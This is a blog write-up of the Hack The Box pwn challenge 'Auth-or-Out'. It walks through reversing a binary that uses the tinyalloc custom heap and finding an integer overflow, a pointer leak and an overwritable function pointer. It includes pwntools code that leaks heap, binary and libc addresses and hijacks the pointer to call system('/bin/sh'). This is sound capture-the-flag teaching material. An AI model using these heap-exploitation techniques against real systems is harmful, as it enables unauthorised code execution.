Auth-or-Out - exploiting a custom heap (HTB pwn)

2023-09-11

Introduction

Auth-or-out is a pwn challenge on the Hack The Box platform. After solving it I realised there are no write-ups for it available, and with my desire to finally spin up this blog, I have no reason anymore to procrastinate :)

Let's dive right in!

Initial analysis

The challenge provides us with a Linux executable. Running file shows us that we got lucky and the binary is not stripped :D
checksec finds that basically all security mitigations are enabled.

Running the program

Running the program provides us with a menu that is very similar to many other heap exploitation challenges: there are options to add an entry, remove it, edit it and print it. When adding an entry, you can also add a note of a size that we can specify. We could start by trying to overflow buffers etc., but I prefer to take a look at the decompiled code first.

Reversing

For this challenge I used Ghidra. With the symbols present, we can easily find and understand the main function.

The first thing that caught my eye is the CustomHeap. 0x3800 bytes are allocated for this data structure, and after zeroing out the allocated memory, ta_init is called to seemingly initialise this custom heap. Looking at the list of functions, we can spot more functions related to this custom heap: ta_alloc, ta_free, etc. Going through these functions you can see that they are not just wrapper functions for libc: a custom heap implementation is present in the binary. Before reversing the implementation by hand, I (luckily) had the idea to google some of these function names. One of the first results was a custom heap implementation called tinyalloc. The GitHub repository has great documentation of this heap implementation.

The custom heap

The tinyalloc heap implementation consists of three main memory regions. The GitHub repository contains a nice visualization to better understand the structure.

The three parts are:

  1. The first four addresses at the top of the heap struct contain pointers to the 1st used block, 1st free block, 1st fresh block, and the current heap top.
  2. Next, a list of heap Blocks is stored. Each block contains the heap address of the block, a pointer to the next block, and the size of the block.
  3. Lastly, the rest of the memory is used for the data that is stored on the heap.
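
To make the bookkeeping layout a bit more concrete, here is a rough ctypes sketch of the two structures described above. The class and field names are illustrative, and the field order simply follows the description in this post; treat both as assumptions and check the tinyalloc source for the real definitions.

```python
import ctypes

class Block(ctypes.Structure):
    # One bookkeeping entry per allocation (names are illustrative).
    _fields_ = [
        ("addr", ctypes.c_uint64),  # heap address of the data this block describes
        ("next", ctypes.c_uint64),  # pointer to the next Block in the same list
        ("size", ctypes.c_uint64),  # size of the data in bytes
    ]

class HeapHeader(ctypes.Structure):
    # The four values at the very start of the custom heap (order assumed).
    _fields_ = [
        ("used", ctypes.c_uint64),   # first used block
        ("free", ctypes.c_uint64),   # first free block
        ("fresh", ctypes.c_uint64),  # first fresh (never used) block
        ("top", ctypes.c_uint64),    # current top of the data region
    ]

print("header:", ctypes.sizeof(HeapHeader), "bytes")
print("block: ", ctypes.sizeof(Block), "bytes")
```

The point of the sketch is only that all of this metadata lives in front of the user data, which is why a forward overflow from a note cannot reach it.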


Based on how the heap is implemented, I had some thoughts on possibilities for exploitation:

  • The implementation comes from a decently popular GitHub repo, so I assume it is sound.
  • The user data is stored at higher addresses than the pointers between blocks and the sizes of blocks. This makes it unlikely that we can overwrite any of these values.

Finding vulnerabilities

With the knowledge of the heap in the back of our mind, we can start to look for some potential vulnerabilities.

Parsing input integers

When parsing the input integers provided by the user, the function at 0x101240 is used. Interestingly, it returns an unsigned long long (64-bit) value. This might prove to be useful.

Parsing input strings

Input strings are parsed using the function at 0x1012bd. Interestingly, the string is not necessarily null-terminated. This could be used to leak values stored after the string.

Allocating space for the note

This code caught my eye as the order did not seem to make sense. Take a look yourself (code starts at 0x1015a5):

new_note = ta_alloc(input_nr + 1);
new_author->Note = new_note;
if (authors[i]->Note == 0x0) {
    printf("Invalid allocation!");
    exit(0);
}
printf("Note: ");
if (input_nr < 0x101) {
    size = input_nr + 1;
}
else {
    size = 0x100;
}
get_user_input(authors[i]->Note,size);

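As you can see, the buffer gets allocated first, and only afterwards is the size checked against 0x101. Even then, the check only caps the number of bytes that are read, not the size of the allocation. What is worse is the addition of 1 to input_nr on the first line, as this can result in an integer overflow: if input_nr is 2^64-1, input_nr + 1 wraps around to 0, while the read that follows still accepts up to 0x100 bytes.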
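
The mismatch between the two sizes can be modelled in a few lines of Python. This is a minimal sketch of the arithmetic in the decompiled snippet, assuming input_nr is a 64-bit unsigned value; the function name is made up for illustration.

```python
MASK64 = (1 << 64) - 1  # unsigned long long arithmetic wraps modulo 2**64

def alloc_and_read_sizes(input_nr):
    """Return (bytes requested from ta_alloc, bytes get_user_input may write)."""
    alloc_size = (input_nr + 1) & MASK64            # ta_alloc(input_nr + 1)
    read_size = input_nr + 1 if input_nr < 0x101 else 0x100
    return alloc_size, read_size

print(alloc_and_read_sizes(16))      # a normal request: both sizes agree
print(alloc_and_read_sizes(MASK64))  # 2**64 - 1: allocation wraps, read does not
```

For ordinary sizes both values match, but for the maximum value the program asks the allocator for 0 bytes and then reads 0x100 bytes into the result.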

The print_author function

Looking at the print_author function you can note something interesting:

puts("----------------------");
printf("Author %llu\n",uVar1);
printf("Name: %s\n",author);
printf("Surname: %s\n",author->Surname);
printf("Age: %llu\n",author->Age);
(*author->Print)(author->Note);
puts("-----------------------");
putchar(L'\n');

As you can see, the note is printed through a function pointer that is stored in the author struct. This is similar to a virtual method (wikipedia). This means that if we can overwrite this value in the data structure, we can redirect the code execution.

Modifying authors

The modify_author function reads 1 byte too many when you input the surname. This will allow us to leak the pointer that is the next element of the author structure.

get_user_input(buffer->Surname,0x11)
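
To see why a completely filled surname leaks the next field, here is a small simulation of how printf("%s") walks memory. It is only a sketch: the pointer value is made up, and the layout (a 16-byte surname directly followed by the note pointer) is an assumption based on the description above.

```python
import struct

def c_string_at(memory, offset):
    """Mimic printf("%s"): return the bytes from offset up to the first null byte."""
    end = memory.find(b"\0", offset)
    return memory[offset:] if end == -1 else memory[offset:end]

note_ptr = 0x0000555555559038  # made-up pointer value for illustration

# A surname that fills all 16 bytes leaves no room for a terminator,
# so the string runs straight into the little-endian note pointer.
surname_and_ptr = b"B" * 16 + struct.pack("<Q", note_ptr)

leaked = c_string_at(surname_and_ptr, 0)
print(leaked)
print(hex(int.from_bytes(leaked[16:], "little")))
```

The output stops at the first null byte, which for a typical 64-bit userland pointer is its seventh byte, so the six significant bytes of the pointer come out with the surname.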

The author struct

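Since I am using this a lot, here is a quick overview of the author struct. Judging by the offsets used in the exploit below, it holds the name, the surname, the note pointer (directly after the surname), the age, and the Print function pointer.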
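
As a rough reconstruction, the struct can be written down with ctypes. The field sizes and order are inferred from the offsets used later in the exploit (0x38 for the whole struct, 0x30 for the function pointer) and are an assumption, not a copy of the original definition.

```python
import ctypes

class Author(ctypes.Structure):
    # Inferred layout; sizes and order are assumptions based on the exploit offsets.
    _fields_ = [
        ("Name", ctypes.c_char * 16),
        ("Surname", ctypes.c_char * 16),
        ("Note", ctypes.c_uint64),   # pointer to the note buffer
        ("Age", ctypes.c_uint64),
        ("Print", ctypes.c_uint64),  # function pointer used by print_author
    ]

for field_name, _ in Author._fields_:
    print(f"{field_name:8s} offset {getattr(Author, field_name).offset:#04x}")
print("size", hex(ctypes.sizeof(Author)))
```

With this layout the note pointer sits at offset 0x20 and the function pointer at offset 0x30, which lines up with the constants in the snippets that follow.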

Exploitation

Finally it is time to put it all together and find the flag. I am not going to put my entire exploit script here, just the interesting parts.

Based on the vulnerabilities described above, I created some helper functions, including this function to easily add an author:

Add author

def add(name: bytes = b'A'*8, surname: bytes = b'B'*8, age: int = 1, size: int = 16, note: bytes = b'A'*16):
    con.sendlineafter(b'Choice: ', b'1')
    con.sendlineafter(b'Name: ', name)
    con.sendlineafter(b'Surname: ', surname)
    con.sendlineafter(b'Age: ', str(age).encode())
    con.sendlineafter(b' size: ', str(size).encode())
    con.sendlineafter(b'Note: ', note)

Leak heap address

Let's get to the real exploit. The first step is to leak the heap address.
The following code abuses the leak that occurs when modifying the last name of an author. Since the surname does not end with a null-byte, the next value in the struct will also be printed, which is the pointer to the note of the author. The note is stored directly after the author struct, so subtracting 0x38 from the leaked pointer gives the address of the first author, which we use as the base address of the heap.

def leak_heap():
    clear_heap() # removes any previous entries to ensure we write to the first author
    add()
    modify(id=1, surname = b'A'*16) # change the surname, exploiting the bug
    print_auth(1)
    con.recvuntil(b'A'*16)
    heap = u64(con.recvline()[:-1].ljust(8,b'\0'))
    return heap - 0x38
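
The ljust call matters because the leaked pointer arrives without its two leading null bytes. Below is a stdlib-only sketch of the same parsing step; u64_padded is a hypothetical stand-in for the pwntools u64 call used above, and the leaked bytes are made up.

```python
import struct

def u64_padded(raw):
    # Pad the leaked bytes to 8 and decode them as a little-endian 64-bit value.
    return struct.unpack("<Q", raw.ljust(8, b"\0"))[0]

line = b"\x38\x90\x55\x55\x55\x55\n"  # made-up leak: 6 pointer bytes plus newline
note_addr = u64_padded(line[:-1])     # drop the trailing newline first
print(hex(note_addr))
print(hex(note_addr - 0x38))          # address of the first author
```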

Arbitrary read

We can achieve an arbitrary read with the following steps:

  1. Add 2 new authors
  2. Delete the first
  3. Add a new author again. This time, set the size of the note to the maximum value of unsigned long long (2^64-1), to abuse the integer overflow when creating the buffer for the note. This author, and the note, are put on the heap at the location of the author that we deleted, so that is in front of the second author. We can now overwrite all the values of the second author. At the location of the note pointer, we put the address that we would like to read from.
  4. Finally, we print author 2.

def arb_read(addr):
    clear_heap()
    add()
    add()
    delete(1)
    # MAX_ULL is 2**64 - 1, so the allocation size wraps around to 0.
    # The payload puts the address that we want to read at the location
    # of the note pointer of the second author.
    add(size=MAX_ULL, note=b'A'*24 + b'B'*32 + p64(addr) + b'A'*8)
    print_auth(2)
    con.recvuntil(b'[')
    leak = u64(con.recvline()[:-2].ljust(8,b'\0'))
    return leak
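
To check that the payload offsets line up, the overflow can be replayed on a toy model of the heap data region. The constants below are assumptions derived from the numbers in this post (a 0x38-byte author, a note pointer at offset 0x20, and 24 bytes occupied by the first default-sized note); the target address is made up.

```python
import struct

AUTHOR_SIZE = 0x38  # assumed struct size (the 0x38 used in leak_heap)
NOTE_OFFSET = 0x20  # assumed offset of the note pointer inside an author
NOTE_SLOT = 24      # assumed space taken by the first, default-sized note

heap = bytearray(0x100)             # toy model of the heap data region
author2 = AUTHOR_SIZE + NOTE_SLOT   # second author sits behind author 1 and its note

target = 0xdeadbeefcafe             # made-up address we want to read
payload = b"A" * 24 + b"B" * 32 + struct.pack("<Q", target) + b"A" * 8

# The new note lands in the freed note slot right after the first author,
# but the read accepts up to 0x100 bytes, so it runs into the second author.
heap[AUTHOR_SIZE:AUTHOR_SIZE + len(payload)] = payload

note_ptr = struct.unpack_from("<Q", heap, author2 + NOTE_OFFSET)[0]
print(hex(note_ptr))
```

In this model the 24 filler bytes cover the old note slot and the 32 B's cover the name and surname of the second author, so the packed address ends up exactly on its note pointer.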

Leak the binary base

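We can now leak the base of the binary by combining the heap leak with the arbitrary read. The function pointer of the first author is stored at offset 0x30 from the heap base and points to PrintNote, so reading it and subtracting the offset of PrintNote gives the base address of the binary.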

heap_base = leak_heap()
log.info(f"Leaked heap address: {hex(heap_base)}")
base_leak = arb_read(heap_base + 0x30) - elf.symbols['PrintNote']
log.info(f"Leaked base address: {hex(base_leak)}")
elf.address = base_leak
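
A cheap sanity check at this point is that the computed base should be page aligned; if it is not, the leak or the symbol offset is probably off. A minimal sketch with made-up numbers (both the leaked value and the PrintNote offset are hypothetical):

```python
PAGE_SIZE = 0x1000

def looks_like_base(addr):
    # A load address is expected to be non-zero and page aligned.
    return addr > 0 and addr % PAGE_SIZE == 0

leaked_print_note = 0x55555555551c  # made-up value returned by the arbitrary read
print_note_offset = 0x151c          # hypothetical value of elf.symbols['PrintNote']

base = leaked_print_note - print_note_offset
print(hex(base), looks_like_base(base))
```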

Leak libc addresses

Next, we leak the libc addresses from the GOT. With these we can determine the libc version (for example using this libc database).

def leak_libc_addresses():
    global libc  # binsh() uses libc later on, so keep it at module level
    got_addr_putchar = elf.got['putchar'] # before running this, make sure elf.address is set correctly
    got_addr_puts = elf.got['puts']
    got_addr_printf = elf.got['printf']
    log.info(f"libc putchar: {hex(arb_read(got_addr_putchar))}")
    log.info(f"libc puts: {hex(arb_read(got_addr_puts))}")
    log.info(f"libc printf: {hex(arb_read(got_addr_printf))}")

    # and after you determined the libc version:
    libc = ELF('path/to/libc')  # ELF is the pwntools class, elf is the challenge binary
    libc.address = arb_read(got_addr_putchar) - libc.symbols['putchar']
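
Identifying a libc from leaked addresses works because libraries are loaded page aligned, so the lowest 12 bits of a symbol's address stay the same under ASLR. The helper below is a small sketch that extracts those bits for comparison against candidate libc versions; the leaked values are made up.

```python
def page_offset(addr):
    """Return the lowest 12 bits of an address as three hex digits."""
    return f"{addr & 0xfff:03x}"

leaks = {"puts": 0x7ffff7e50e50, "printf": 0x7ffff7e306f0}  # made-up leaks
for symbol, addr in leaks.items():
    print(symbol, page_offset(addr))
```

Leaking more than one symbol, as done above, narrows down the candidates much faster than a single address.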

Popping a shell

Now that we know the version and base of libc, we only need to pop a shell. Once again, we will overwrite the second author using the same trick as for the arbitrary read. This time however, we point the note pointer to the start of the heap, where the name of the new author stores the /bin/sh string. Then, we overwrite the function pointer with the address of the system function in libc. Finally, we print the second author, which calls system with /bin/sh as its argument, and get the shell.

def binsh(heap_base: int):
    clear_heap()
    add()
    add()
    delete(1)
    add(size=MAX_ULL, name=b'/bin/sh\0', note=b'A'*56 + p64(heap_base) + b'A'*8 + p64(libc.symbols['system']))
    print_auth(2)
    con.interactive() # hand the connection over to the spawned shell
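
Instead of counting filler bytes by hand, the payload can also be built from field offsets. The helper below is a hypothetical stdlib-only sketch (place_qwords is not part of pwntools), and the addresses are made up; the offsets 0x20 and 0x30 are the assumed positions of the note pointer and the function pointer in the second author, which starts 24 bytes into the note.

```python
import struct

def place_qwords(fields, filler=b"A"):
    """Build a payload with little-endian 64-bit values at the given offsets."""
    out = bytearray()
    for offset in sorted(fields):
        if offset < len(out):
            raise ValueError(f"field at {offset:#x} overlaps the previous one")
        out += filler * (offset - len(out))  # pad up to the field
        out += struct.pack("<Q", fields[offset])
    return bytes(out)

heap_base = 0x555555559000    # made-up: where the "/bin/sh" name is stored
system_addr = 0x7ffff7e1a290  # made-up: address of system in libc
SECOND_AUTHOR = 24            # assumed distance from the note to the second author

payload = place_qwords({
    SECOND_AUTHOR + 0x20: heap_base,    # note pointer -> "/bin/sh"
    SECOND_AUTHOR + 0x30: system_addr,  # function pointer -> system
})
print(len(payload), payload[56:64].hex())
```

Under these assumptions the result is byte-for-byte the same as the hand-written b'A'*56 + p64(heap_base) + b'A'*8 + p64(...) expression above, but it is easier to adapt if an offset turns out to be different.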